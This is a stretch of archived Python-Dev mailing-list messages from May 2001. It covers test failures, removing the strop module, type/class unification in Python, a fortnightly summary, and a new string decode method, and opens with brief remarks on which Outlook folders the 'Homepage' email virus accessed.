but Greg started it! ;-) Does anyone know which folders those two 'GetDefaultFolder' statements open ? I suspect it's sent-mail and trash, or some such, but I don't know enough about Outlook to know if it even *has* sent-mail and trash folders :) Thanx for sending it through, Samuele, it was fun reading, and useful to our helpdesk (especially the fact that it only sends out mails once, even though it starts the porn page every time, and that it doesn't do anything harmful at all.) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From MarkH at ActiveState.com Thu May 10 12:36:13 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Thu, 10 May 2001 20:36:13 +1000 Subject: [Python-Dev] Homepage In-Reply-To: <20010510113138.K16486@xs4all.nl> Message-ID: > > Set u=t.GetDefaultFolder(6) > > Set u=t.GetDefaultFolder(3) > I know it's off-topic, but Greg started it! ;-) Does anyone know which > folders those two 'GetDefaultFolder' statements open ? I suspect it's > sent-mail and trash, or some such, but I don't know enough about > Outlook to > know if it even *has* sent-mail and trash folders :) Running makepy.py over the Outlook type library yields the following: olFolderCalendar =0x9 # from enum OlDefaultFolders olFolderContacts =0xa # from enum OlDefaultFolders olFolderDeletedItems =0x3 # from enum OlDefaultFolders olFolderDrafts =0x10 # from enum OlDefaultFolders olFolderInbox =0x6 # from enum OlDefaultFolders olFolderJournal =0xb # from enum OlDefaultFolders olFolderNotes =0xc # from enum OlDefaultFolders olFolderOutbox =0x4 # from enum OlDefaultFolders olFolderSentMail =0x5 # from enum OlDefaultFolders olFolderTasks =0xd # from enum OlDefaultFolders So it appears the inbox and deleted items. Mark. From tim.one at home.com Thu May 10 10:54:42 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 10 May 2001 04:54:42 -0400 Subject: [Python-Dev] test___all__ failing on WIndows Message-ID: > python ../lib/test/regrtest.py test___all__ test___all__ test test___all__ failed -- tty has no __all__ attribute 1 test failed: test___all__ C:\Code\python\dist\src\PCbuild> I assume this is yet another case where some excruciatingly non-obvious sequence of failing imports manages to leave behind a damaged module object in sys.modules that prevents test___all__'s import of tty from getting the ImportError it *ought* to get under Windows (and betting termios is the ultimate culprit). I've fixed enough of these. Somebody who thinks this is "a feature" gets to do it this time . From guido at digicool.com Thu May 10 15:43:07 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 08:43:07 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 22:00:30 -0400." References: Message-ID: <200105101343.IAA01450@cj20424-a.reston1.va.home.com> > [Guido] > > Yes, but in the mean time the fact that it's buggy doesn't bother > > me at all. Let it be as buggy as it always was -- that's one more > > reason to stop using it! :-) [Tim] > I think that's unsustainable in this specific case: stringobject and > stropmodule contained several utility functions with the same names > that clearly started life as identical code. Over time they got out > of synch, and when they punched me in the face today, I had no idea > which was "right" and which "wrong". Turned out they both had the > same bug, and the clearest way to fix it in stringobject.c without > leaving a more inconsistent x-module mess was to bring the > once-common utility routines back into synch. Of course, the real bug was copy-and-paste programming. The common code should have been factored out rather than copied. > As /F said, though, the mymemreplace() approach is inefficient and > "should be" replaced wholesale. If that's done in stringobject.c > alone, great, then I won't care about the legacy routines in > stropmodule.c either. What I can't abide is having one copy of a > function in the codebase work and a clone of it not work -- unless > you can keep the undocumented history of both in your mind at all > times, you're just as likely to bump into the broken one first when > searching the code base, and if you're unlucky never even realize it > is "the broken one" (or, if you're lucky, bump into the good one > too, and then pee away time trying to understand the differences). Here's an idea. We remove stropmodule.c, and replace it with a strop.py that issues a warning and then imports selected things from string.py. The only complication is that there are a few constants and one function in strop that are still imported into string.py; I propose to move these to an "internal" extension module (e.g. "_string"). --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Thu May 10 16:02:59 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 09:02:59 -0500 Subject: [Python-Dev] test_mmap failing? In-Reply-To: Your message of "Wed, 09 May 2001 23:17:34 -0400." <15098.2126.368714.159135@slothrop.digicool.com> References: <15098.2126.368714.159135@slothrop.digicool.com> Message-ID: <200105101402.JAA01678@cj20424-a.reston1.va.home.com> > The latest CVS build works on my Linux 2.2.12 system. No problem with > test_mmap. But test_pty does fail with some complaints about FCNTL, > which Fred just removed. Maybe Fred is working in an alternate > universe where test_mmap and test_pty are swapped. Strange. The *both* work for me with the latest CVS (and even after removing all *.pyc files!), although last night (?) I recall seeing a test_pty faulure too. --Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Thu May 10 16:16:24 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 10 May 2001 09:16:24 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com> References: <200105100227.VAA00607@cj20424-a.reston1.va.home.com> Message-ID: <15098.41656.128146.826459@beluga.mojam.com> Guido> Yes, but in the mean time the fact that it's buggy doesn't bother Guido> me at all. Let it be as buggy as it always was -- that's one Guido> more reason to stop using it! :-) In fact, perhaps the import warning could mention that strop is buggy and won't be fixed... :-) Skip From skip at pobox.com Thu May 10 16:32:15 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 10 May 2001 09:32:15 -0500 Subject: [Python-Dev] test___all__ failing on WIndows In-Reply-To: References: Message-ID: <15098.42607.84670.323361@beluga.mojam.com> >> python ../lib/test/regrtest.py test___all__ Tim> test___all__ Tim> test test___all__ failed -- tty has no __all__ attribute Tim> 1 test failed: test___all__ grumble, grumble... Tim> I assume this is yet another case where some excruciatingly Tim> non-obvious sequence of failing imports manages to leave behind a Tim> damaged module object in sys.modules that prevents test___all__'s Tim> import of tty from getting the ImportError it *ought* to get under Tim> Windows (and betting termios is the ultimate culprit). I (thankfully) gave up even pretending to run Windows recently, so I can only make a suggestion for others who look into this problem. Try this: Change test___all__.check_all so that the except clause reads: except ImportError, msg: then print out msg when an import fails. You should get the actual module that failed to import. If foo.py consists of simply "import bar", and I import it, I see that bar couldn't be imported: >>> try: ... import foo ... except ImportError, msg: ... print msg ... No module named bar Skip From fdrake at acm.org Thu May 10 16:57:59 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Thu, 10 May 2001 10:57:59 -0400 (EDT) Subject: [Python-Dev] Re: test_mmap failing? In-Reply-To: References: Message-ID: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com> Tim Peters writes: > But having suffered too many "impossible problems" the last 36 hours, my > confidence is shot <0.93 wink>. Is test_mmap failing for anyone else under > current CVS? Fred, are you *sure* it fails for you -- if so, does the > problem actually go away if you revert mmapmodule.c? It was indeed showing the behavior I described! I figured out what it was this morning and closed the patch again. The problem, of course(!), had nothing to do with mmap, before or after any of the recent changes to mmap. Or any old changes. It had a lot to do with the change I made to the socket module. ;-) While figuring out the reported bug in the socket module, I created named pipes, including one named "foo". The mmap test opens a file "foo" with mode "w+" in the directory in which I just happened to create the named pipe, so it ended up with a file object opened on a pipe -- things just don't work the same for these beasts! Needless to say test_mmap failed with a cryptic error message. This begs the question, though -- should tests that create temp files check that the files don't already exist, and fail with a more descriptive error if they do? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake at acm.org Thu May 10 16:59:08 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Thu, 10 May 2001 10:59:08 -0400 (EDT) Subject: [Python-Dev] test_mmap failing? In-Reply-To: <15098.2126.368714.159135@slothrop.digicool.com> References: <15098.2126.368714.159135@slothrop.digicool.com> Message-ID: <15098.44220.515660.330116@cj42289-a.reston1.va.home.com> Jeremy Hylton writes: > The latest CVS build works on my Linux 2.2.12 system. No problem with > test_mmap. But test_pty does fail with some complaints about FCNTL, > which Fred just removed. Maybe Fred is working in an alternate > universe where test_mmap and test_pty are swapped. Or, I could just be working in an alternate universe altogether. I've been known to do that.... -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From paulp at ActiveState.com Thu May 10 23:55:36 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Thu, 10 May 2001 14:55:36 -0700 Subject: [Python-Dev] Type/class Message-ID: <3AFB0E58.1F0ABCA6@ActiveState.com> -------- Original Message -------- Log Message: Make attributes of subtypes writable, but only for dynamic subtypes derived in Python using a class statement; static subtypes derived in C still have read-only attributes. -------- Original Message -------- I would like to argue that "plain old C types" should act as if they have __dict__s for consistency with other types. It is sometimes useful to be able to annotate objects by adding attributes to them. But this only works with class instance objects, not instances of types. Paul Prescod From jeremy at digicool.com Thu May 10 23:59:34 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Thu, 10 May 2001 17:59:34 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <3AFB0E58.1F0ABCA6@ActiveState.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> Message-ID: <15099.3910.648127.25900@slothrop.digicool.com> >>>>> "PP" == Paul Prescod writes: PP> I would like to argue that "plain old C types" should act as if PP> they have __dict__s for consistency with other types. It is PP> sometimes useful to be able to annotate objects by adding PP> attributes to them. But this only works with class instance PP> objects, not instances of types. Every type should have an __dict__ of type dict? Then every dict must have an __dict__, including the __dict__ of __dict__? Once every object has an __dict__, every object will be mutable. Then no object will be usable as a dict key and we can get rid of dict's entirely. Jeremy From fdrake at cj42289-a.reston1.va.home.com Fri May 11 00:47:14 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Thu, 10 May 2001 18:47:14 -0400 (EDT) Subject: [Python-Dev] [maintenance doc updates] Message-ID: <20010510224714.15E4328946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/maint-docs/ Incremental update for the maintenance version docs. From fdrake at cj42289-a.reston1.va.home.com Fri May 11 01:04:40 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Thu, 10 May 2001 19:04:40 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010510230440.30DB228946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental update for the development version of the docs. From guido at digicool.com Fri May 11 02:03:13 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 19:03:13 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Thu, 10 May 2001 14:55:36 MST." <3AFB0E58.1F0ABCA6@ActiveState.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> Message-ID: <200105110003.TAA02924@cj20424-a.reston1.va.home.com> Glad somebody is watching what I'm doing here -- I was afraid I was having too much fun by myself! :-) > -------- Original Message -------- > Log Message: > > Make attributes of subtypes writable, but only for dynamic subtypes > derived in Python using a class statement; static subtypes derived in > C still have read-only attributes. > -------- Original Message -------- > > I would like to argue that "plain old C types" should act as if they > have __dict__s for consistency with other types. Good point. Plain old types currently (in the descr-branch) have a readonly dict (using a proxy) and no settable attributes. I will probably give types settable attributes in a next revision, but I prefer not to make the type's dict writable -- I need to be able to watch the setattr calls so that if someone changes DictType.__getitem__ I can change the mp_subscript to a C function that calls the __getitem__ method. For speed reasons, if you don't override them, the C tp_slot functions carry out the operation directly, and the __slot__ methods call the C tp_slot functions; but when __slot__ is overridden, tp_slot must call __slot__. > It is sometimes useful > to be able to annotate objects by adding attributes to them. But this > only works with class instance objects, not instances of types. > > Paul Prescod If you're talking about *instances*: instances of subtypes of built-in types have a dict of their own to which you can add stuff to your heart's content. Instances of built-in types will continue not to have a dict (it would cost too much space if *every* object had a dict, even if it was a NULL pointer when no attrs are defined). If you mean you want to annotate types like you can annotate classes, that should be possible once I implement what I describe above. --Guido van Rossum (home page: http://www.python.org/~guido/) From paulp at ActiveState.com Fri May 11 01:22:16 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Thu, 10 May 2001 16:22:16 -0700 Subject: [Python-Dev] Type/class References: <3AFB0E58.1F0ABCA6@ActiveState.com> <15099.3910.648127.25900@slothrop.digicool.com> Message-ID: <3AFB22A8.A0A6A4D4@ActiveState.com> Jeremy Hylton wrote: > > >>>>> "PP" == Paul Prescod writes: > > PP> I would like to argue that "plain old C types" should act as if > PP> they have __dict__s for consistency with other types. It is > PP> sometimes useful to be able to annotate objects by adding > PP> attributes to them. But this only works with class instance > PP> objects, not instances of types. > > Every type should have an __dict__ of type dict? Then every dict > must have an __dict__, including the __dict__ of __dict__? What's wrong with that? Every object has a type, even type objects, and type types. It only becomes a problem if you try to recursively walk all the dictionaries in the system adding information to them. Otherwise they have null pointers that "act as if" they were empty dictionaries. > Once every object has an __dict__, every object will be mutable. Then > no object will be usable as a dict key and we can get rid of dict's > entirely. According to that argument, instances cannot be dictionary keys. That is simply not true. Objects do not implement their hash functions in terms of ALL of their attributes! -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From mwh at python.net Fri May 11 01:31:53 2001 From: mwh at python.net (Michael Hudson) Date: Fri, 11 May 2001 00:31:53 +0100 (BST) Subject: [Python-Dev] python-dev summary 2001-04-26 - 2001-05-10 Message-ID: This is a summary of traffic on the python-dev mailing list between Apr 26 and May 9 (inclusive) 2001. It is intended to inform the wider Python community of ongoing developments. To comment, just post to python-list at python.org or comp.lang.python in the usual way. Give your posting a meaningful subject line, and if it's about a PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep iteration) All python-dev members are interested in seeing ideas discussed by the community, so don't hesitate to take a stance on a PEP if you have an opinion. This is the seventh summary written by Michael Hudson. Summaries are archived at: Posting distribution (with apologies to mbm) Number of articles in summary: 228 40 | [|] | [|] | [|] | [|] [|] | [|] [|] 30 | [|] [|] | [|] [|] | [|] [|] | [|] [|] | [|] [|] 20 | [|] [|] [|] [|] | [|] [|] [|] [|] | [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] 10 | [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] 0 +-007-024-010-001-010-010-044-023-019-010-002-012-017-039 Thu 26| Sat 28| Mon 30| Wed 02| Fri 04| Sun 06| Tue 08| Fri 27 Sun 29 Tue 01 Thu 03 Sat 05 Mon 07 Wed 09 A fairly quiet, but interesting fortnight (and I don't mean the sarcastic replies to the Homepage virus). A few build problems and bugs fixed, and one very involved discussion (cf. most of the rest of this summary). * type == class? * Guido posted a message from Jim Althoff describing the metaclass system used in Smalltalk: He also mentioned a problem that is bound to bite any attempt to heal the type/class split in Python. If there are to be no special cases in the type system then classes and types in particular should be instances. This sounds innocuous, but consider: class MyDictType(DictType): def __repr__(self): return "MyDictType(%s)" % DictType.__repr__(self) The code is hoping that, as in today's Python, DictType.__repr__ will return an unbound method - the __repr__ method of vanilla dictionaries, so that output of the form MyDictType({1:2}) will be given. But DictType is now an instance, so there's another interpretation for DictType.__repr__ - the bound DictType's own __repr__ method! This is a fundamental problem; currently "class.attr" and "instance.attr" have different meanings in Python, and any attempt to conflate the notions of "class" and "instance" is bound to run aground. Guido proposed some hairy disambiguation rules in the above-linked message, but no-one was particularly enthused about them, possibly because no-one could really get their head round them. The long term solution is to change the syntax for getting - or removing entirely - unbound methods. As far as anyone can make out, all that unbound methods are used for is called superclasses' methods from overriding methods, so if one can find another way of spelling that, then removing unbound methods entirely could be contemplated. So the discussion on that went around for a bit, with no really new compelling ideas surfacing. There was some support for some kind of souped up super.foo() construct: To me, the most plausible ideas came from Thomas Heller: and from Paul Dubois, who suggested nicking the feature renaming feature from Eiffel: though the best syntax for the latter is far from clear. There's also the king-sized issue of backwards compatibility; to a first degree of approximation, *all* Python code that uses inheritance would need to be updated to accommodate changes in the meaning of "class.attribute". Another __future__ statement, maybe? * data.decode * Marc-Andre Lemburg asked if it might be an idea if string objects sprouted an .decode method: After some umming and arring and accusations of bloat, this got BDFL approval, and should appear in CVS imminently. * Moving MacPython to sourceforge * Jack Jansen posted notice that he intends to move the MacPython code over to sourceforge: It will be nice to finally have all the code in the same place! Cheers, M. From paulp at ActiveState.com Fri May 11 02:26:43 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Thu, 10 May 2001 17:26:43 -0700 Subject: [Python-Dev] Type/class References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> Message-ID: <3AFB31C3.5CEF9064@ActiveState.com> Guido van Rossum wrote: > >... > > Good point. Plain old types currently (in the descr-branch) have a > readonly dict (using a proxy) and no settable attributes. I will > probably give types settable attributes in a next revision, but I > prefer not to make the type's dict writable -- I need to be able to > watch the setattr calls so that if someone changes > DictType.__getitem__ I can change the mp_subscript to a C function > that calls the __getitem__ method. I'm happy to have you look and see if I'm setting something magical. But if I'm not, I would like you to just add the thing I made to an internal private dictionary and remember it. I think that's what you are talking about. >... > If you're talking about *instances*: instances of subtypes of built-in > types have a dict of their own to which you can add stuff to your > heart's content. Instances of built-in types will continue not to > have a dict (it would cost too much space if *every* object had a > dict, even if it was a NULL pointer when no attrs are defined). Darn. That *is* what I was hoping for. There is an implementation that is slowish if you use it, but has little cost if you don't: keep a big dict mapping object pointers to their associated dictionaries (if any). For purposes of discussion, call it sys._associations. Then have the getattr on "PyObject" look in this dict of dicts for attributes that it can't otherwise find, and setattr construct dictionaries in the dict of dicts if necessary. That's the usual workaround anyhow so this would be a nicer syntax and a more orthoganal model. Price: a hasattr that would return false or getattr that would raise AttributeError would be a little slower. They would have to check the dictionary of dictionaries before deciding that they really don't have the attribute. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From guido at digicool.com Fri May 11 03:57:36 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 20:57:36 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Thu, 10 May 2001 17:26:43 MST." <3AFB31C3.5CEF9064@ActiveState.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> <3AFB31C3.5CEF9064@ActiveState.com> Message-ID: <200105110157.UAA03123@cj20424-a.reston1.va.home.com> > > Good point. Plain old types currently (in the descr-branch) have a > > readonly dict (using a proxy) and no settable attributes. I will > > probably give types settable attributes in a next revision, but I > > prefer not to make the type's dict writable -- I need to be able to > > watch the setattr calls so that if someone changes > > DictType.__getitem__ I can change the mp_subscript to a C function > > that calls the __getitem__ method. > > I'm happy to have you look and see if I'm setting something magical. But > if I'm not, I would like you to just add the thing I made to an internal > private dictionary and remember it. I think that's what you are talking > about. OK, we agree on this one. > >... > > If you're talking about *instances*: instances of subtypes of built-in > > types have a dict of their own to which you can add stuff to your > > heart's content. Instances of built-in types will continue not to > > have a dict (it would cost too much space if *every* object had a > > dict, even if it was a NULL pointer when no attrs are defined). > > Darn. That *is* what I was hoping for. > > There is an implementation that is slowish if you use it, but has little > cost if you don't: keep a big dict mapping object pointers to their > associated dictionaries (if any). For purposes of discussion, call it > sys._associations. Then have the getattr on "PyObject" look in this dict > of dicts for attributes that it can't otherwise find, and setattr > construct dictionaries in the dict of dicts if necessary. > > That's the usual workaround anyhow so this would be a nicer syntax and a > more orthoganal model. > > Price: a hasattr that would return false or getattr that would raise > AttributeError would be a little slower. They would have to check the > dictionary of dictionaries before deciding that they really don't have > the attribute. Personally, if you want this outrageous implementation, you should be paying for it, not the infrastructure. It feels contrary to Python's treatment of objects. I don't like elaborate workarounds in the implementation like this -- probably because the performance model becomes muddy. --Guido van Rossum (home page: http://www.python.org/~guido/) From greg at cosc.canterbury.ac.nz Fri May 11 03:05:11 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 11 May 2001 13:05:11 +1200 (NZST) Subject: [Python-Dev] Type/class In-Reply-To: <3AFB22A8.A0A6A4D4@ActiveState.com> Message-ID: <200105110105.NAA17698@s454.cosc.canterbury.ac.nz> Paul Prescod : > Otherwise > they have null pointers that "act as if" they were empty > dictionaries. Actually, they need to act as if they were empty except for a "__dict__" slot which contains another one of these magic things. :-) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From barry at digicool.com Fri May 11 05:45:38 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Thu, 10 May 2001 23:45:38 -0400 Subject: [Python-Dev] Interview with Mark Lutz Message-ID: <15099.24674.311472.184935@anthem.wooz.org> Great interview with Mark on the ORA site, linked from /. http://python.oreilly.com/news/python_0501.html -Barry From fredrik at effbot.org Fri May 11 07:57:34 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Fri, 11 May 2001 07:57:34 +0200 Subject: [Python-Dev] Interview with Mark Lutz References: <15099.24674.311472.184935@anthem.wooz.org> Message-ID: <022d01c0d9eb$d3e3d680$e46940d5@hagrid> barry wrote: > Great interview with Mark on the ORA site, linked from /. > > http://python.oreilly.com/news/python_0501.html you mean that python-devers read slashdot for python news, when you have the daily url: http://www.pythonware.com/daily Cheers /F From thomas at xs4all.net Fri May 11 11:02:26 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Fri, 11 May 2001 11:02:26 +0200 Subject: [Python-Dev] Re: test_mmap failing? In-Reply-To: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Thu, May 10, 2001 at 10:57:59AM -0400 References: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com> Message-ID: <20010511110226.M16486@xs4all.nl> On Thu, May 10, 2001 at 10:57:59AM -0400, Fred L. Drake, Jr. wrote: [ Fred violates Tim's Rule #1 (don't ever use 'foo' for anything) and gets bitten in the derriere ] > This begs the question, though -- should tests that create temp > files check that the files don't already exist, and fail with a more > descriptive error if they do? I'd think so, yes. I'd also suggest nothing uses something as lamenamed as 'foo', 'test' or 'spam' -- I'm sure Tim will agree with me, at least on the first account :) How about mmap calls its test-testfile 'test_mmap.foo' ? -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Fri May 11 11:34:25 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 11 May 2001 11:34:25 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: <3AFBB221.F29BCB9A@lemburg.com> Michael Hudson wrote: > > "M.-A. Lemburg" writes: > > > I've attached the patch. Due to a small reorganisation the patch is > > a little longer -- symmetry has its price at C level too ;-) > > I may be being dense, but can you explain what's going on here: > > ->> u'\u00e3'.encode('latin-1') > '\xe3' > ->> u'\u00e3'.encode("latin-1").decode("latin-1") > Traceback (most recent call last): > File "", line 1, in ? > UnicodeError: ASCII encoding error: ordinal not in range(128) The string.decode() method will try to reuse the Unicode codecs here. To do this, it will have to convert the string to Unicode first and this fails due to the character not being in the ASCII range. > Can you come up with some other example I can use it tomorrow's > python-dev summary? I will add some codecs which make the .decode() method useful next week. The ones I have in mind are base64, hex and some of the other binascii codecs. Also, the ROT13 codec I posted will go into the core as simple example. With those you will be able to write: data.encode('base64').decode('base64') and get back data. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at effbot.org Fri May 11 11:43:14 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Fri, 11 May 2001 11:43:14 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> Message-ID: <049801c0d9fe$cd98aef0$e46940d5@hagrid> mal wrote: > > I may be being dense, but can you explain what's going on here: > > > > ->> u'\u00e3'.encode('latin-1') > > '\xe3' > > ->> u'\u00e3'.encode("latin-1").decode("latin-1") > > Traceback (most recent call last): > > File "", line 1, in ? > > UnicodeError: ASCII encoding error: ordinal not in range(128) > > The string.decode() method will try to reuse the Unicode > codecs here. To do this, it will have to convert the string > to Unicode first and this fails due to the character not being > in the ASCII range. can you take that again? shouldn't michael's example be equivalent to: unicode(u"\u00e3".encode("latin-1"), "latin-1") if not, I'd argue that your "decode" design is broken, instead of just buggy... Cheers /F From mal at lemburg.com Fri May 11 11:50:24 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 11 May 2001 11:50:24 +0200 Subject: [Python-Dev] Interview with Mark Lutz References: <15099.24674.311472.184935@anthem.wooz.org> <022d01c0d9eb$d3e3d680$e46940d5@hagrid> Message-ID: <3AFBB5E0.620710C8@lemburg.com> Fredrik Lundh wrote: > > barry wrote: > > > Great interview with Mark on the ORA site, linked from /. > > > > http://python.oreilly.com/news/python_0501.html > > you mean that python-devers read slashdot for python news, > when you have the daily url: > > http://www.pythonware.com/daily I just bought one of those nice machines that can run pippy and was wondering how to get AvantGo (the channel software that comes with it) to synchronize with your daily URL... wouldn't it be possible to setup a channel for this ? The AvantGo channels can be registered at their site (http://www.avantgo.com), but the contents would have to be "mobile friendly"... anyway, just a thought ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 11 12:07:40 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 11 May 2001 12:07:40 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> Message-ID: <3AFBB9EC.F75C158D@lemburg.com> Fredrik Lundh wrote: > > mal wrote: > > > > I may be being dense, but can you explain what's going on here: > > > > > > ->> u'\u00e3'.encode('latin-1') > > > '\xe3' > > > ->> u'\u00e3'.encode("latin-1").decode("latin-1") > > > Traceback (most recent call last): > > > File "", line 1, in ? > > > UnicodeError: ASCII encoding error: ordinal not in range(128) > > > > The string.decode() method will try to reuse the Unicode > > codecs here. To do this, it will have to convert the string > > to Unicode first and this fails due to the character not being > > in the ASCII range. > > can you take that again? shouldn't michael's example be > equivalent to: > > unicode(u"\u00e3".encode("latin-1"), "latin-1") > > if not, I'd argue that your "decode" design is broken, instead > of just buggy... Well, it is sort of broken, I agree. The reason is that PyString_Encode() and PyString_Decode() guarantee the returned object to be a string object. To be able to reuse Unicode codecs I added code which converts Unicode back to a string in case the codec return an Unicode object (which the .decode() method does). This is what's failing. Perhaps I should simply remove the restriction and have both APIs return the codec's return object as-is ?! (I would be in favour of this, but I'm not sure whether this is already in use by someone...) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Fri May 11 15:31:18 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 08:31:18 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Thu, 10 May 2001 20:57:36 EST." <200105110157.UAA03123@cj20424-a.reston1.va.home.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> <3AFB31C3.5CEF9064@ActiveState.com> <200105110157.UAA03123@cj20424-a.reston1.va.home.com> Message-ID: <200105111331.IAA04171@cj20424-a.reston1.va.home.com> > > > Good point. Plain old types currently (in the descr-branch) have a > > > readonly dict (using a proxy) and no settable attributes. I will > > > probably give types settable attributes in a next revision, but I > > > prefer not to make the type's dict writable -- I need to be able to > > > watch the setattr calls so that if someone changes > > > DictType.__getitem__ I can change the mp_subscript to a C function > > > that calls the __getitem__ method. Alas, I think I'll have to withdraw this promise for now. The truly built-in types are static objects that are shared between all interpreter instances within one process, and each type has only one dictionary pointer. So changes to the __dict__ would affect other interpreter instances, and that's unacceptable. I've thought about alternatives; I can't give each interpreter its own set of types because sometimes objects are shared between interpreters (e.g. the dictionary of interned strings), and then then their types have to be shared too! Not having any object sharing would mean too much of a change to the foundations of the implementation. I think we'll have to live with this restriction until Python 3000. Personally, I don't mind -- I see mostly possible abuses for the ability to change attributes of e.g. DictType or StringType. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From sdm7g at Virginia.EDU Fri May 11 15:43:32 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Fri, 11 May 2001 09:43:32 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <200105111331.IAA04171@cj20424-a.reston1.va.home.com> Message-ID: Catching up on this thread -- mostly because it looks like I'm going to have to use ExtensionClass to make pyobjc classes into python classes rather than types -- you can add that to the lisp of real world uses of Don's Metaclass hack that Tim questioned. Reading up on MetaClasses in Smalltalk again makes me appreciate the simplicity of a prototype system where everything is just an object -- all objects can be cloned, and some objects are only used for cloning -- they are the exemplars of their type which fill the role of Classes. Unfortunately, although prototypes would be a lot simpler, it would be a pretty incompatible change for Python -- I can't think of any way to get there without a lot of breakage. (Still -- I wonder if there's a way they could be used under the covers in the implementation to make it simpler. Prototype semantics are basically a superset of Class based semantics, which is how it was easy to do Smalltalk in Self.) Classes are necessary for statically typed O-O languages, but 